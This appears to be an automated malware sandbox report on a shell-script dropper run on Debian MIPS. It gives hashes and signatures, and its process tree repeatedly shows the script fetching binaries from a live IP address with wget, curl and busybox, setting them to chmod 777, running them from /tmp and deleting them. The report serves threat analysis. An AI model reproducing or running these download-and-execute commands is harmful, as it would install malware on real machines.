Analysis
-
max time kernel
61s -
max time network
63s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system -
submitted
28/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
-
Size
10KB
-
MD5
8831ac149f5712a653b2ed7d4a827e57
-
SHA1
e48119cbe7dcbf516620e6b82c96350ecb491554
-
SHA256
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd
-
SHA512
368cdcd017b026288093ca2a837a48c67cee319efbe80778a1a7c80f7206446b4944f3ade0ba0e8bfa35bc140fc293621629cd99e3e8e54e7226c2598122500f
-
SSDEEP
96:HMMfw0o7MQoiYo7XjoP3uZJs/CqDyu7hlQdddimXhGXhaXh+WXhyXhCXhnEQyhlT:MAmyjhlQdddiGmSHqaGhlQddtmSHqalu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:735
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:746
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:752
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:758
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:780
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:804
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:821
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:827
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:833
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:865
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:878
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:884
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:890
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:896
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:902
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:908
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:914
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:920
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:926
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:932
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:938
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:944
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:950
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:956
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:962
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:968
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:974
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:980
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97